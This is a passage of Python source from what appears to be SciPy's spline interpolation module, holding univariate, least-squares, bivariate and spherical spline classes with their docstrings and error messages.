nest=None):\n n = data[10]\n if nest is None:\n k,m = data[5],len(data[0])\n nest = m+k+1 # this is the maximum bound for nest\n else:\n if not n <= nest:\n raise ValueError(\"`nest` can only be increased\")\n t, c, fpint, nrdata = [np.resize(data[j], nest) for j in [8,9,11,12]]\n\n args = data[:8] + (t,c,n,fpint,nrdata,data[13])\n data = dfitpack.fpcurf1(*args)\n return data\n\n def set_smoothing_factor(self, s):\n \"\"\" Continue spline computation with the given smoothing\n factor s and with the knots found at the last call.\n\n This routine modifies the spline in place.\n\n \"\"\"\n data = self._data\n if data[6] == -1:\n warnings.warn('smoothing factor unchanged for'\n 'LSQ spline with fixed knots')\n return\n args = data[:6] + (s,) + data[7:]\n data = dfitpack.fpcurf1(*args)\n if data[-1] == 1:\n # nest too small, setting to maximum bound\n data = self._reset_nest(data)\n self._data = data\n self._reset_class()\n\n def __call__(self, x, nu=0, ext=None):\n \"\"\"\n Evaluate spline (or its nu-th derivative) at positions x.\n\n Parameters\n ----------\n x : array_like\n A 1-D array of points at which to return the value of the smoothed\n spline or its derivatives. Note: x can be unordered but the\n evaluation is more efficient if x is (partially) ordered.\n nu : int\n The order of derivative of the spline to compute.\n ext : int\n Controls the value returned for elements of ``x`` not in the\n interval defined by the knot sequence.\n\n * if ext=0 or 'extrapolate', return the extrapolated value.\n * if ext=1 or 'zeros', return 0\n * if ext=2 or 'raise', raise a ValueError\n * if ext=3 or 'const', return the boundary value.\n\n The default value is 0, passed from the initialization of\n UnivariateSpline.\n\n \"\"\"\n x = np.asarray(x)\n # empty input yields empty output\n if x.size == 0:\n return array([])\n# if nu is None:\n# return dfitpack.splev(*(self._eval_args+(x,)))\n# return dfitpack.splder(nu=nu,*(self._eval_args+(x,)))\n if ext is None:\n ext = self.ext\n else:\n try:\n ext = _extrap_modes[ext]\n except KeyError:\n raise ValueError(\"Unknown extrapolation mode %s.\" % ext)\n return fitpack.splev(x, self._eval_args, der=nu, ext=ext)\n\n def get_knots(self):\n \"\"\" Return positions of interior knots of the spline.\n\n Internally, the knot vector contains ``2*k`` additional boundary knots.\n \"\"\"\n data = self._data\n k,n = data[5],data[7]\n return data[8][k:n-k]\n\n def get_coeffs(self):\n \"\"\"Return spline coefficients.\"\"\"\n data = self._data\n k,n = data[5],data[7]\n return data[9][:n-k-1]\n\n def get_residual(self):\n \"\"\"Return weighted sum of squared residuals of the spline approximation.\n\n This is equivalent to::\n\n sum((w[i] * (y[i]-spl(x[i])))**2, axis=0)\n\n \"\"\"\n return self._data[10]\n\n def integral(self, a, b):\n \"\"\" Return definite integral of the spline between two given points.\n\n Parameters\n ----------\n a : float\n Lower limit of integration.\n b : float\n Upper limit of integration.\n\n Returns\n -------\n integral : float\n The value of the definite integral of the spline between limits.\n\n Examples\n --------\n >>> from scipy.interpolate import UnivariateSpline\n >>> x = np.linspace(0, 3, 11)\n >>> y = x**2\n >>> spl = UnivariateSpline(x, y)\n >>> spl.integral(0, 3)\n 9.0\n\n which agrees with :math:`\\int x^2 dx = x^3 / 3` between the limits\n of 0 and 3.\n\n A caveat is that this routine assumes the spline to be zero outside of\n the data limits:\n\n >>> spl.integral(-1, 4)\n 9.0\n >>> spl.integral(-1, 0)\n 0.0\n\n \"\"\"\n return dfitpack.splint(*(self._eval_args+(a,b)))\n\n def derivatives(self, x):\n \"\"\" Return all derivatives of the spline at the point x.\n\n Parameters\n ----------\n x : float\n The point to evaluate the derivatives at.\n\n Returns\n -------\n der : ndarray, shape(k+1,)\n Derivatives of the orders 0 to k.\n\n Examples\n --------\n >>> from scipy.interpolate import UnivariateSpline\n >>> x = np.linspace(0, 3, 11)\n >>> y = x**2\n >>> spl = UnivariateSpline(x, y)\n >>> spl.derivatives(1.5)\n array([2.25, 3.0, 2.0, 0])\n\n \"\"\"\n d,ier = dfitpack.spalde(*(self._eval_args+(x,)))\n if not ier == 0:\n raise ValueError(\"Error code returned by spalde: %s\" % ier)\n return d\n\n def roots(self):\n \"\"\" Return the zeros of the spline.\n\n Restriction: only cubic splines are supported by fitpack.\n \"\"\"\n k = self._data[5]\n if k == 3:\n z,m,ier = dfitpack.sproot(*self._eval_args[:2])\n if not ier == 0:\n raise ValueError(\"Error code returned by spalde: %s\" % ier)\n return z[:m]\n raise NotImplementedError('finding roots unsupported for '\n 'non-cubic splines')\n\n def derivative(self, n=1):\n \"\"\"\n Construct a new spline representing the derivative of this spline.\n\n Parameters\n ----------\n n : int, optional\n Order of derivative to evaluate. Default: 1\n\n Returns\n -------\n spline : UnivariateSpline\n Spline of order k2=k-n representing the derivative of this\n spline.\n\n See Also\n --------\n splder, antiderivative\n\n Notes\n -----\n\n .. versionadded:: 0.13.0\n\n Examples\n --------\n This can be used for finding maxima of a curve:\n\n >>> from scipy.interpolate import UnivariateSpline\n >>> x = np.linspace(0, 10, 70)\n >>> y = np.sin(x)\n >>> spl = UnivariateSpline(x, y, k=4, s=0)\n\n Now, differentiate the spline and find the zeros of the\n derivative. (NB: `sproot` only works for order 3 splines, so we\n fit an order 4 spline):\n\n >>> spl.derivative().roots() / np.pi\n array([ 0.50000001, 1.5 , 2.49999998])\n\n This agrees well with roots :math:`\\pi/2 + n\\pi` of `cos(x) = sin'(x)`.\n\n \"\"\"\n tck = fitpack.splder(self._eval_args, n)\n return UnivariateSpline._from_tck(tck, self.ext)\n\n def antiderivative(self, n=1):\n \"\"\"\n Construct a new spline representing the antiderivative of this spline.\n\n Parameters\n ----------\n n : int, optional\n Order of antiderivative to evaluate. Default: 1\n\n Returns\n -------\n spline : UnivariateSpline\n Spline of order k2=k+n representing the antiderivative of this\n spline.\n\n Notes\n -----\n\n .. versionadded:: 0.13.0\n\n See Also\n --------\n splantider, derivative\n\n Examples\n --------\n >>> from scipy.interpolate import UnivariateSpline\n >>> x = np.linspace(0, np.pi/2, 70)\n >>> y = 1 / np.sqrt(1 - 0.8*np.sin(x)**2)\n >>> spl = UnivariateSpline(x, y, s=0)\n\n The derivative is the inverse operation of the antiderivative,\n although some floating point error accumulates:\n\n >>> spl(1.7), spl.antiderivative().derivative()(1.7)\n (array(2.1565429877197317), array(2.1565429877201865))\n\n Antiderivative can be used to evaluate definite integrals:\n\n >>> ispl = spl.antiderivative()\n >>> ispl(np.pi/2) - ispl(0)\n 2.2572053588768486\n\n This is indeed an approximation to the complete elliptic integral\n :math:`K(m) = \\\\int_0^{\\\\pi/2} [1 - m\\\\sin^2 x]^{-1/2} dx`:\n\n >>> from scipy.special import ellipk\n >>> ellipk(0.8)\n 2.2572053268208538\n\n \"\"\"\n tck = fitpack.splantider(self._eval_args, n)\n return UnivariateSpline._from_tck(tck, self.ext)\n\n\nclass InterpolatedUnivariateSpline(UnivariateSpline):\n \"\"\"\n One-dimensional interpolating spline for a given set of data points.\n\n Fits a spline y = spl(x) of degree `k` to the provided `x`, `y` data. Spline\n function passes through all provided points. Equivalent to\n `UnivariateSpline` with s=0.\n\n Parameters\n ----------\n x : (N,) array_like\n Input dimension of data points -- must be increasing\n y : (N,) array_like\n input dimension of data points\n w : (N,) array_like, optional\n Weights for spline fitting. Must be positive. If None (default),\n weights are all equal.\n bbox : (2,) array_like, optional\n 2-sequence specifying the boundary of the approximation interval. If\n None (default), ``bbox=[x[0], x[-1]]``.\n k : int, optional\n Degree of the smoothing spline. Must be 1 <= `k` <= 5.\n ext : int or str, optional\n Controls the extrapolation mode for elements\n not in the interval defined by the knot sequence.\n\n * if ext=0 or 'extrapolate', return the extrapolated value.\n * if ext=1 or 'zeros', return 0\n * if ext=2 or 'raise', raise a ValueError\n * if ext=3 of 'const', return the boundary value.\n\n The default value is 0.\n\n check_finite : bool, optional\n Whether to check that the input arrays contain only finite numbers.\n Disabling may give a performance gain, but may result in problems\n (crashes, non-termination or non-sensical results) if the inputs\n do contain infinities or NaNs.\n Default is False.\n\n See Also\n --------\n UnivariateSpline : Superclass -- allows knots to be selected by a\n smoothing condition\n LSQUnivariateSpline : spline for which knots are user-selected\n splrep : An older, non object-oriented wrapping of FITPACK\n splev, sproot, splint, spalde\n BivariateSpline : A similar class for two-dimensional spline interpolation\n\n Notes\n -----\n The number of data points must be larger than the spline degree `k`.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> from scipy.interpolate import InterpolatedUnivariateSpline\n >>> x = np.linspace(-3, 3, 50)\n >>> y = np.exp(-x**2) + 0.1 * np.random.randn(50)\n >>> spl = InterpolatedUnivariateSpline(x, y)\n >>> plt.plot(x, y, 'ro', ms=5)\n >>> xs = np.linspace(-3, 3, 1000)\n >>> plt.plot(xs, spl(xs), 'g', lw=3, alpha=0.7)\n >>> plt.show()\n\n Notice that the ``spl(x)`` interpolates `y`:\n\n >>> spl.get_residual()\n 0.0\n\n \"\"\"\n def __init__(self, x, y, w=None, bbox=[None]*2, k=3,\n ext=0, check_finite=False):\n\n if check_finite:\n if (not np.isfinite(x).all() or not np.isfinite(y).all() or\n not np.isfinite(w).all()):\n raise ValueError(\"Input must not contain NaNs or infs.\")\n\n # _data == x,y,w,xb,xe,k,s,n,t,c,fp,fpint,nrdata,ier\n self._data = dfitpack.fpcurf0(x,y,k,w=w,\n xb=bbox[0],xe=bbox[1],s=0)\n self._reset_class()\n\n try:\n self.ext = _extrap_modes[ext]\n except KeyError:\n raise ValueError(\"Unknown extrapolation mode %s.\" % ext)\n\n\n_fpchec_error_string = \"\"\"The input parameters have been rejected by fpchec. \\\nThis means that at least one of the following conditions is violated:\n\n1) k+1 <= n-k-1 <= m\n2) t(1) <= t(2) <= ... <= t(k+1)\n t(n-k) <= t(n-k+1) <= ... <= t(n)\n3) t(k+1) < t(k+2) < ... < t(n-k)\n4) t(k+1) <= x(i) <= t(n-k)\n5) The conditions specified by Schoenberg and Whitney must hold\n for at least one subset of data points, i.e., there must be a\n subset of data points y(j) such that\n t(j) < y(j) < t(j+k+1), j=1,2,...,n-k-1\n\"\"\"\n\n\nclass LSQUnivariateSpline(UnivariateSpline):\n \"\"\"\n One-dimensional spline with explicit internal knots.\n\n Fits a spline y = spl(x) of degree `k` to the provided `x`, `y` data. `t`\n specifies the internal knots of the spline\n\n Parameters\n ----------\n x : (N,) array_like\n Input dimension of data points -- must be increasing\n y : (N,) array_like\n Input dimension of data points\n t : (M,) array_like\n interior knots of the spline. Must be in ascending order and::\n\n bbox[0] < t[0] < ... < t[-1] < bbox[-1]\n\n w : (N,) array_like, optional\n weights for spline fitting. Must be positive. If None (default),\n weights are all equal.\n bbox : (2,) array_like, optional\n 2-sequence specifying the boundary of the approximation interval. If\n None (default), ``bbox = [x[0], x[-1]]``.\n k : int, optional\n Degree of the smoothing spline. Must be 1 <= `k` <= 5.\n Default is k=3, a cubic spline.\n ext : int or str, optional\n Controls the extrapolation mode for elements\n not in the interval defined by the knot sequence.\n\n * if ext=0 or 'extrapolate', return the extrapolated value.\n * if ext=1 or 'zeros', return 0\n * if ext=2 or 'raise', raise a ValueError\n * if ext=3 of 'const', return the boundary value.\n\n The default value is 0.\n\n check_finite : bool, optional\n Whether to check that the input arrays contain only finite numbers.\n Disabling may give a performance gain, but may result in problems\n (crashes, non-termination or non-sensical results) if the inputs\n do contain infinities or NaNs.\n Default is False.\n\n Raises\n ------\n ValueError\n If the interior knots do not satisfy the Schoenberg-Whitney conditions\n\n See Also\n --------\n UnivariateSpline : Superclass -- knots are specified by setting a\n smoothing condition\n InterpolatedUnivariateSpline : spline passing through all points\n splrep : An older, non object-oriented wrapping of FITPACK\n splev, sproot, splint, spalde\n BivariateSpline : A similar class for two-dimensional spline interpolation\n\n Notes\n -----\n The number of data points must be larger than the spline degree `k`.\n\n Knots `t` must satisfy the Schoenberg-Whitney conditions,\n i.e., there must be a subset of data points ``x[j]`` such that\n ``t[j] < x[j] < t[j+k+1]``, for ``j=0, 1,...,n-k-2``.\n\n Examples\n --------\n >>> from scipy.interpolate import LSQUnivariateSpline, UnivariateSpline\n >>> import matplotlib.pyplot as plt\n >>> x = np.linspace(-3, 3, 50)\n >>> y = np.exp(-x**2) + 0.1 * np.random.randn(50)\n\n Fit a smoothing spline with a pre-defined internal knots:\n\n >>> t = [-1, 0, 1]\n >>> spl = LSQUnivariateSpline(x, y, t)\n\n >>> xs = np.linspace(-3, 3, 1000)\n >>> plt.plot(x, y, 'ro', ms=5)\n >>> plt.plot(xs, spl(xs), 'g-', lw=3)\n >>> plt.show()\n\n Check the knot vector:\n\n >>> spl.get_knots()\n array([-3., -1., 0., 1., 3.])\n\n Constructing lsq spline using the knots from another spline:\n\n >>> x = np.arange(10)\n >>> s = UnivariateSpline(x, x, s=0)\n >>> s.get_knots()\n array([ 0., 2., 3., 4., 5., 6., 7., 9.])\n >>> knt = s.get_knots()\n >>> s1 = LSQUnivariateSpline(x, x, knt[1:-1]) # Chop 1st and last knot\n >>> s1.get_knots()\n array([ 0., 2., 3., 4., 5., 6., 7., 9.])\n\n \"\"\"\n\n def __init__(self, x, y, t, w=None, bbox=[None]*2, k=3,\n ext=0, check_finite=False):\n\n if check_finite:\n if (not np.isfinite(x).all() or not np.isfinite(y).all() or\n not np.isfinite(w).all() or not np.isfinite(t).all()):\n raise ValueError(\"Input(s) must not contain NaNs or infs.\")\n\n # _data == x,y,w,xb,xe,k,s,n,t,c,fp,fpint,nrdata,ier\n xb = bbox[0]\n xe = bbox[1]\n if xb is None:\n xb = x[0]\n if xe is None:\n xe = x[-1]\n t = concatenate(([xb]*(k+1), t, [xe]*(k+1)))\n n = len(t)\n if not alltrue(t[k+1:n-k]-t[k:n-k-1] > 0, axis=0):\n raise ValueError('Interior knots t must satisfy '\n 'Schoenberg-Whitney conditions')\n if not dfitpack.fpchec(x, t, k) == 0:\n raise ValueError(_fpchec_error_string)\n data = dfitpack.fpcurfm1(x, y, k, t, w=w, xb=xb, xe=xe)\n self._data = data[:-3] + (None, None, data[-1])\n self._reset_class()\n\n try:\n self.ext = _extrap_modes[ext]\n except KeyError:\n raise ValueError(\"Unknown extrapolation mode %s.\" % ext)\n\n\n################ Bivariate spline ####################\n\nclass _BivariateSplineBase(object):\n \"\"\" Base class for Bivariate spline s(x,y) interpolation on the rectangle\n [xb,xe] x [yb, ye] calculated from a given set of data points\n (x,y,z).\n\n See Also\n --------\n bisplrep, bisplev : an older wrapping of FITPACK\n BivariateSpline :\n implementation of bivariate spline interpolation on a plane grid\n SphereBivariateSpline :\n implementation of bivariate spline interpolation on a spherical grid\n \"\"\"\n\n def get_residual(self):\n \"\"\" Return weighted sum of squared residuals of the spline\n approximation: sum ((w[i]*(z[i]-s(x[i],y[i])))**2,axis=0)\n \"\"\"\n return self.fp\n\n def get_knots(self):\n \"\"\" Return a tuple (tx,ty) where tx,ty contain knots positions\n of the spline with respect to x-, y-variable, respectively.\n The position of interior and additional knots are given as\n t[k+1:-k-1] and t[:k+1]=b, t[-k-1:]=e, respectively.\n \"\"\"\n return self.tck[:2]\n\n def get_coeffs(self):\n \"\"\" Return spline coefficients.\"\"\"\n return self.tck[2]\n\n def __call__(self, x, y, mth=None, dx=0, dy=0, grid=True):\n \"\"\"\n Evaluate the spline or its derivatives at given positions.\n\n Parameters\n ----------\n x, y : array_like\n Input coordinates.\n\n If `grid` is False, evaluate the spline at points ``(x[i],\n y[i]), i=0, ..., len(x)-1``. Standard Numpy broadcasting\n is obeyed.\n\n If `grid` is True: evaluate spline at the grid points\n defined by the coordinate arrays x, y. The arrays must be\n sorted to increasing order.\n dx : int\n Order of x-derivative\n\n .. versionadded:: 0.14.0\n dy : int\n Order of y-derivative\n\n .. versionadded:: 0.14.0\n grid : bool\n Whether to evaluate the results on a grid spanned by the\n input arrays, or at points specified by the input arrays.\n\n .. versionadded:: 0.14.0\n\n mth : str\n Deprecated argument. Has no effect.\n\n \"\"\"\n x = np.asarray(x)\n y = np.asarray(y)\n\n if mth is not None:\n warnings.warn(\"The `mth` argument is deprecated and will be removed\",\n FutureWarning)\n\n tx, ty, c = self.tck[:3]\n kx, ky = self.degrees\n if grid:\n if x.size == 0 or y.size == 0:\n return np.zeros((x.size, y.size), dtype=self.tck[2].dtype)\n\n if dx or dy:\n z,ier = dfitpack.parder(tx,ty,c,kx,ky,dx,dy,x,y)\n if not ier == 0:\n raise ValueError(\"Error code returned by parder: %s\" % ier)\n else:\n z,ier = dfitpack.bispev(tx,ty,c,kx,ky,x,y)\n if not ier == 0:\n raise ValueError(\"Error code returned by bispev: %s\" % ier)\n else:\n # standard Numpy broadcasting\n if x.shape != y.shape:\n x, y = np.broadcast_arrays(x, y)\n\n shape = x.shape\n x = x.ravel()\n y = y.ravel()\n\n if x.size == 0 or y.size == 0:\n return np.zeros(shape, dtype=self.tck[2].dtype)\n\n if dx or dy:\n z,ier = dfitpack.pardeu(tx,ty,c,kx,ky,dx,dy,x,y)\n if not ier == 0:\n raise ValueError(\"Error code returned by pardeu: %s\" % ier)\n else:\n z,ier = dfitpack.bispeu(tx,ty,c,kx,ky,x,y)\n if not ier == 0:\n raise ValueError(\"Error code returned by bispeu: %s\" % ier)\n\n z = z.reshape(shape)\n return z\n\n\n_surfit_messages = {1:\"\"\"\nThe required storage space exceeds the available storage space: nxest\nor nyest too small, or s too small.\nThe weighted least-squares spline corresponds to the current set of\nknots.\"\"\",\n 2:\"\"\"\nA theoretically impossible result was found during the iteration\nprocess for finding a smoothing spline with fp = s: s too small or\nbadly chosen eps.\nWeighted sum of squared residuals does not satisfy abs(fp-s)/s < tol.\"\"\",\n 3:\"\"\"\nthe maximal number of iterations maxit (set to 20 by the program)\nallowed for finding a smoothing spline with fp=s has been reached:\ns too small.\nWeighted sum of squared residuals does not satisfy abs(fp-s)/s < tol.\"\"\",\n 4:\"\"\"\nNo more knots can be added because the number of b-spline coefficients\n(nx-kx-1)*(ny-ky-1) already exceeds the number of data points m:\neither s or m too small.\nThe weighted least-squares spline corresponds to the current set of\nknots.\"\"\",\n 5:\"\"\"\nNo more knots can be added because the additional knot would (quasi)\ncoincide with an old one: s too small or too large a weight to an\ninaccurate data point.\nThe weighted least-squares spline corresponds to the current set of\nknots.\"\"\",\n 10:\"\"\"\nError on entry, no approximation returned. The following conditions\nmust hold:\nxb<=x[i]<=xe, yb<=y[i]<=ye, w[i]>0, i=0..m-1\nIf iopt==-1, then\n xb<tx[kx+1]<tx[kx+2]<...<tx[nx-kx-2]<xe\n yb<ty[ky+1]<ty[ky+2]<...<ty[ny-ky-2]<ye\"\"\",\n -3:\"\"\"\nThe coefficients of the spline returned have been computed as the\nminimal norm least-squares solution of a (numerically) rank deficient\nsystem (deficiency=%i). If deficiency is large, the results may be\ninaccurate. Deficiency may strongly depend on the value of eps.\"\"\"\n }\n\n\nclass BivariateSpline(_BivariateSplineBase):\n \"\"\"\n Base class for bivariate splines.\n\n This describes a spline ``s(x, y)`` of degrees ``kx`` and ``ky`` on\n the rectangle ``[xb, xe] * [yb, ye]`` calculated from a given set\n of data points ``(x, y, z)``.\n\n This class is meant to be subclassed, not instantiated directly.\n To construct these splines, call either `SmoothBivariateSpline` or\n `LSQBivariateSpline`.\n\n See Also\n --------\n UnivariateSpline : a similar class for univariate spline interpolation\n SmoothBivariateSpline :\n to create a BivariateSpline through the given points\n LSQBivariateSpline :\n to create a BivariateSpline using weighted least-squares fitting\n SphereBivariateSpline :\n bivariate spline interpolation in spherical cooridinates\n bisplrep : older wrapping of FITPACK\n bisplev : older wrapping of FITPACK\n\n \"\"\"\n\n @classmethod\n def _from_tck(cls, tck):\n \"\"\"Construct a spline object from given tck and degree\"\"\"\n self = cls.__new__(cls)\n if len(tck) != 5:\n raise ValueError(\"tck should be a 5 element tuple of tx, ty, c, kx, ky\")\n self.tck = tck[:3]\n self.degrees = tck[3:]\n return self\n\n def ev(self, xi, yi, dx=0, dy=0):\n \"\"\"\n Evaluate the spline at points\n\n Returns the interpolated value at ``(xi[i], yi[i]),\n i=0,...,len(xi)-1``.\n\n Parameters\n ----------\n xi, yi : array_like\n Input coordinates. Standard Numpy broadcasting is obeyed.\n dx : int, optional\n Order of x-derivative\n\n .. versionadded:: 0.14.0\n dy : int, optional\n Order of y-derivative\n\n .. versionadded:: 0.14.0\n \"\"\"\n return self.__call__(xi, yi, dx=dx, dy=dy, grid=False)\n\n def integral(self, xa, xb, ya, yb):\n \"\"\"\n Evaluate the integral of the spline over area [xa,xb] x [ya,yb].\n\n Parameters\n ----------\n xa, xb : float\n The end-points of the x integration interval.\n ya, yb : float\n The end-points of the y integration interval.\n\n Returns\n -------\n integ : float\n The value of the resulting integral.\n\n \"\"\"\n tx,ty,c = self.tck[:3]\n kx,ky = self.degrees\n return dfitpack.dblint(tx,ty,c,kx,ky,xa,xb,ya,yb)\n\n\nclass SmoothBivariateSpline(BivariateSpline):\n \"\"\"\n Smooth bivariate spline approximation.\n\n Parameters\n ----------\n x, y, z : array_like\n 1-D sequences of data points (order is not important).\n w : array_like, optional\n Positive 1-D sequence of weights, of same length as `x`, `y` and `z`.\n bbox : array_like, optional\n Sequence of length 4 specifying the boundary of the rectangular\n approximation domain. By default,\n ``bbox=[min(x,tx),max(x,tx), min(y,ty),max(y,ty)]``.\n kx, ky : ints, optional\n Degrees of the bivariate spline. Default is 3.\n s : float, optional\n Positive smoothing factor defined for estimation condition:\n ``sum((w[i]*(z[i]-s(x[i], y[i])))**2, axis=0) <= s``\n Default ``s=len(w)`` which should be a good value if ``1/w[i]`` is an\n estimate of the standard deviation of ``z[i]``.\n eps : float, optional\n A threshold for determining the effective rank of an over-determined\n linear system of equations. `eps` should have a value between 0 and 1,\n the default is 1e-16.\n\n See Also\n --------\n bisplrep : an older wrapping of FITPACK\n bisplev : an older wrapping of FITPACK\n UnivariateSpline : a similar class for univariate spline interpolation\n LSQUnivariateSpline : to create a BivariateSpline using weighted\n\n Notes\n -----\n The length of `x`, `y` and `z` should be at least ``(kx+1) * (ky+1)``.\n\n \"\"\"\n\n def __init__(self, x, y, z, w=None, bbox=[None] * 4, kx=3, ky=3, s=None,\n eps=None):\n xb,xe,yb,ye = bbox\n nx,tx,ny,ty,c,fp,wrk1,ier = dfitpack.surfit_smth(x,y,z,w,\n xb,xe,yb,ye,\n kx,ky,s=s,\n eps=eps,lwrk2=1)\n if ier > 10: # lwrk2 was to small, re-run\n nx,tx,ny,ty,c,fp,wrk1,ier = dfitpack.surfit_smth(x,y,z,w,\n xb,xe,yb,ye,\n kx,ky,s=s,\n eps=eps,lwrk2=ier)\n if ier in [0,-1,-2]: # normal return\n pass\n else:\n message = _surfit_messages.get(ier,'ier=%s' % (ier))\n warnings.warn(message)\n\n self.fp = fp\n self.tck = tx[:nx],ty[:ny],c[:(nx-kx-1)*(ny-ky-1)]\n self.degrees = kx,ky\n\n\nclass LSQBivariateSpline(BivariateSpline):\n \"\"\"\n Weighted least-squares bivariate spline approximation.\n\n Parameters\n ----------\n x, y, z : array_like\n 1-D sequences of data points (order is not important).\n tx, ty : array_like\n Strictly ordered 1-D sequences of knots coordinates.\n w : array_like, optional\n Positive 1-D array of weights, of the same length as `x`, `y` and `z`.\n bbox : (4,) array_like, optional\n Sequence of length 4 specifying the boundary of the rectangular\n approximation domain. By default,\n ``bbox=[min(x,tx),max(x,tx), min(y,ty),max(y,ty)]``.\n kx, ky : ints, optional\n Degrees of the bivariate spline. Default is 3.\n eps : float, optional\n A threshold for determining the effective rank of an over-determined\n linear system of equations. `eps` should have a value between 0 and 1,\n the default is 1e-16.\n\n See Also\n --------\n bisplrep : an older wrapping of FITPACK\n bisplev : an older wrapping of FITPACK\n UnivariateSpline : a similar class for univariate spline interpolation\n SmoothBivariateSpline : create a smoothing BivariateSpline\n\n Notes\n -----\n The length of `x`, `y` and `z` should be at least ``(kx+1) * (ky+1)``.\n\n \"\"\"\n\n def __init__(self, x, y, z, tx, ty, w=None, bbox=[None]*4, kx=3, ky=3,\n eps=None):\n nx = 2*kx+2+len(tx)\n ny = 2*ky+2+len(ty)\n tx1 = zeros((nx,),float)\n ty1 = zeros((ny,),float)\n tx1[kx+1:nx-kx-1] = tx\n ty1[ky+1:ny-ky-1] = ty\n\n xb,xe,yb,ye = bbox\n tx1,ty1,c,fp,ier = dfitpack.surfit_lsq(x,y,z,tx1,ty1,w,\n xb,xe,yb,ye,\n kx,ky,eps,lwrk2=1)\n if ier > 10:\n tx1,ty1,c,fp,ier = dfitpack.surfit_lsq(x,y,z,tx1,ty1,w,\n xb,xe,yb,ye,\n kx,ky,eps,lwrk2=ier)\n if ier in [0,-1,-2]: # normal return\n pass\n else:\n if ier < -2:\n deficiency = (nx-kx-1)*(ny-ky-1)+ier\n message = _surfit_messages.get(-3) % (deficiency)\n else:\n message = _surfit_messages.get(ier, 'ier=%s' % (ier))\n warnings.warn(message)\n self.fp = fp\n self.tck = tx1, ty1, c\n self.degrees = kx, ky\n\n\nclass RectBivariateSpline(BivariateSpline):\n \"\"\"\n Bivariate spline approximation over a rectangular mesh.\n\n Can be used for both smoothing and interpolating data.\n\n Parameters\n ----------\n x,y : array_like\n 1-D arrays of coordinates in strictly ascending order.\n z : array_like\n 2-D array of data with shape (x.size,y.size).\n bbox : array_like, optional\n Sequence of length 4 specifying the boundary of the rectangular\n approximation domain. By default,\n ``bbox=[min(x,tx),max(x,tx), min(y,ty),max(y,ty)]``.\n kx, ky : ints, optional\n Degrees of the bivariate spline. Default is 3.\n s : float, optional\n Positive smoothing factor defined for estimation condition:\n ``sum((w[i]*(z[i]-s(x[i], y[i])))**2, axis=0) <= s``\n Default is ``s=0``, which is for interpolation.\n\n See Also\n --------\n SmoothBivariateSpline : a smoothing bivariate spline for scattered data\n bisplrep : an older wrapping of FITPACK\n bisplev : an older wrapping of FITPACK\n UnivariateSpline : a similar class for univariate spline interpolation\n\n \"\"\"\n\n def __init__(self, x, y, z, bbox=[None] * 4, kx=3, ky=3, s=0):\n x, y = ravel(x), ravel(y)\n if not all(diff(x) > 0.0):\n raise TypeError('x must be strictly increasing')\n if not all(diff(y) > 0.0):\n raise TypeError('y must be strictly increasing')\n if not ((x.min() == x[0]) and (x.max() == x[-1])):\n raise TypeError('x must be strictly ascending')\n if not ((y.min() == y[0]) and (y.max() == y[-1])):\n raise TypeError('y must be strictly ascending')\n if not x.size == z.shape[0]:\n raise TypeError('x dimension of z must have same number of '\n 'elements as x')\n if not y.size == z.shape[1]:\n raise TypeError('y dimension of z must have same number of '\n 'elements as y')\n z = ravel(z)\n xb, xe, yb, ye = bbox\n nx, tx, ny, ty, c, fp, ier = dfitpack.regrid_smth(x, y, z, xb, xe, yb,\n ye, kx, ky, s)\n\n if ier not in [0, -1, -2]:\n msg = _surfit_messages.get(ier, 'ier=%s' % (ier))\n raise ValueError(msg)\n\n self.fp = fp\n self.tck = tx[:nx], ty[:ny], c[:(nx - kx - 1) * (ny - ky - 1)]\n self.degrees = kx, ky\n\n\n_spherefit_messages = _surfit_messages.copy()\n_spherefit_messages[10] = \"\"\"\nERROR. On entry, the input data are controlled on validity. The following\n restrictions must be satisfied:\n -1<=iopt<=1, m>=2, ntest>=8 ,npest >=8, 0<eps<1,\n 0<=teta(i)<=pi, 0<=phi(i)<=2*pi, w(i)>0, i=1,...,m\n lwrk1 >= 185+52*v+10*u+14*u*v+8*(u-1)*v**2+8*m\n kwrk >= m+(ntest-7)*(npest-7)\n if iopt=-1: 8<=nt<=ntest , 9<=np<=npest\n 0<tt(5)<tt(6)<...<tt(nt-4)<pi\n 0<tp(5)<tp(6)<...<tp(np-4)<2*pi\n if iopt>=0: s>=0\n if one of these conditions is found to be violated,control\n is immediately repassed to the calling program. in that\n case there is no approximation returned.\"\"\"\n_spherefit_messages[-3] = \"\"\"\nWARNING. The coefficients of the spline returned have been computed as the\n minimal norm least-squares solution of a (numerically) rank\n deficient system (deficiency=%i, rank=%i). Especially if the rank\n deficiency, which is computed by 6+(nt-8)*(np-7)+ier, is large,\n the results may be inaccurate. They could also seriously depend on\n the value of eps.\"\"\"\n\n\nclass SphereBivariateSpline(_BivariateSplineBase):\n \"\"\"\n Bivariate spline s(x,y) of degrees 3 on a sphere, calculated from a\n given set of data points (theta,phi,r).\n\n .. versionadded:: 0.11.0\n\n See Also\n --------\n bisplrep, bisplev : an older wrapping of FITPACK\n UnivariateSpline : a similar class for univariate spline interpolation\n SmoothUnivariateSpline :\n to create a BivariateSpline through the given points\n LSQUnivariateSpline :\n to create a BivariateSpline using weighted least-squares fitting\n \"\"\"\n\n def __call__(self, theta, phi, dtheta=0, dphi=0, grid=True):\n \"\"\"\n Evaluate the spline or its derivatives at given positions.\n\n Parameters\n ----------\n theta, phi : array_like\n Input coordinates.\n\n If `grid` is False, evaluate the spline at points\n ``(theta[i], phi[i]), i=0, ..., len(x)-1``. Standard\n Numpy broadcasting is obeyed.\n\n If `grid` is True: evaluate spline at the grid points\n defined by the coordinate arrays theta, phi. The arrays\n must be sorted to increasing order.\n dtheta : int, optional\n Order of theta-derivative\n\n .. versionadded:: 0.14.0\n dphi : int\n Order of phi-derivative\n\n .. versionadded:: 0.14.0\n grid : bool\n Whether to evaluate the results on a grid spanned by the\n input arrays, or at points specified by the input arrays.\n\n .. versionadded:: 0.14.0\n\n \"\"\"\n theta = np.asarray(theta)\n phi = np.asarray(phi)\n\n if theta.size > 0 and (theta.min() < 0. or theta.max() > np.pi):\n raise ValueError(\"requested theta out of bounds.\")\n if phi.size > 0 and (phi.min() < 0. or phi.max() > 2. * np.pi):\n raise ValueError(\"requested phi out of bounds.\")\n\n return _BivariateSplineBase.__call__(self, theta, phi,\n dx=dtheta, dy=dphi, grid=grid)\n\n def ev(self, theta, phi, dtheta=0, dphi=0):\n \"\"\"\n Evaluate the spline at points\n\n Returns the interpolated value at ``(theta[i], phi[i]),\n i=0,...,len(theta)-1``.\n\n Parameters\n ----------\n theta, phi : array_like\n Input coordinates. Standard Numpy broadcasting is 